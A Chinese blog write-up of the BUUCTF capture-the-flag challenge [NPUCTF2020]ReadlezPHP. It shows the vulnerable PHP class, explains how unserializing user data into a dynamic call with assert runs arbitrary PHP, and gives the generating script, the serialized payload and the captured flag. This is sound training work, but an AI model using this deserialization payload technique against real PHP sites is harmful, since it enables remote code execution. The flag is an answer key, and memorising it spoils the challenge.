web buuctf [NPUCTF2020]ReadlezPHP

最新推荐文章于 2022-05-22 11:09:35 发布
最新推荐文章于 2022-05-22 11:09:35 发布
阅读量385 收藏 2
点赞数
文章标签: assert断言函数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44214568/article/details/124021958
版权

知识点:assert()断言函数

assert — 检查一个断言是否为 false
assert(mixed $assertion, Throwable $exception = ?): bool
如果 assertion 是字符串,它将会被 assert() 当做 PHP 代码来执行。

1.开题:

2.查看源代码 view-source:url

在源码下面

 

查看,获得源码

<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;

if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}

@$ppp = unserialize($_GET["data"]);

 代码审计,关键代码漏洞是

echo $b($a) :令b=assert,a=php代码,可以执行php代码,结合前面的echo,将代码结果进行输出

3.构造payload

<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
}

$c=new HelloPhp();
$c->a="phpinfo()";
$c->b="assert";
$c=serialize($c);
print($c);

生成payload:data=

O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}

4.传参执行

ctrl+f搜索flag

 

 flag{c54b3486-ba6e-403c-bebc-12c3b5b14480}

半杯雨水敬过客
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[NPUCTF2020]ReadlezPHP
missht0的博客
01-30 276
[NPUCTF2020]ReadlezPHP 在源码里面搜索php,搜到一个 访问后是源码 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } public function __de
[BUUCTF][NPUCTF2020]ReadlezPHP
朋克归零膏的博客
10-28 330
执行函数的方式挺有意思,但是平时自己就没怎么总结过各种php执行代码的方式,现在总结一下。
buuctf-web-[NPUCTF2020]ReadlezPHP
weixin_46079186的博客
07-20 276
打开题目,想查看源码发现不能右键肯定有东西,f12 查看 找到一个链接 打开拿到源代码,看样子是个反序列化 关键代码 调用_destruct函数执行echo \$b(\$a),利用这个函数执行任意我们想执行的函数 $a = $this->a; $b = $this->b; echo $b($a); 构造参数 <?php class HelloPhp { public $a; public $b; } $c = new HelloPhp; $c->b .
2020年最新web寄生虫程序.zip
09-04
2020年的Web寄生虫程序可能具备了优化功能,使新生成的页面能更快地被百度、搜狗、360等搜索引擎抓取和索引。这包括合理的元标签设置、XML站点地图的生成以及遵循搜索引擎的爬虫友好规则。 6. **引蜘蛛爬行**: ...
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
在题目【BJDCTF2020]Mark loves cat】中,我们看到攻击者通过`.git`泄露获取到了网站的源码。通过运行`GitHack.py`脚本,他们找到了`flag.php`和`index.php`。在`index.php`中,代码检查了`GET`和`POST`中是否都有`...
BUUCTFweb之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
web_programming2020_autumn
02-15
web_programming2020_autumn
海康WEB3.2无插件开发包2020.zip
02-27
WEB3.2无插件版本开发包,支持高版本谷歌、火狐浏览器,同时需要设备支持Websocket取流。无插件版本需要使用nginx代理服务器。
NPUCTF2020]ReadlezPHP
Hopeace的博客
10-20 2836
[NPUCTF2020]ReadlezPHP0x01 浏览题目0x02 分析题目php @0x03 复现0x04 补充 作者:Hopeace 靶机地址:https://buuoj.cn/challenges#[NPUCTF2020]ReadlezPHP 0x01 浏览题目 主页和源代码都没有什么有用的信息 抓包试试response里有木有东西 http://www.nwpu.edu.cn 西工大的宣传页面,对此题属于无用信息 扫目录,没有结果 再仔细看一遍源代码 ctrl + f 搜索.php看有没有泄露的
buuctf-ReadlezPHP(反序列化)
m0_62094846的博客
05-22 376
点开后是源代码,要把前面的view-source:删了 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } public function __destruct(){ ...
buuctf web
最新发布
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web题目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF(Server Side Request Forgery)漏洞,可以通过对内网web应用实施攻击获取webshell。因此,在buuctf web题目中,可能需要掌握SSRF漏洞的利用和对web应用的渲染函数(render函数)进行利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [【CTF】buuctf web 详解(持续更新)](https://blog.csdn.net/m0_52923241/article/details/119641325)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [【BUUCTF刷题】Web解题方法总结(一)](https://blog.csdn.net/qq_45834505/article/details/114276572)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [BUUCTFWeb真题学习整理(一)](https://blog.csdn.net/qq_41429081/article/details/98042205)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值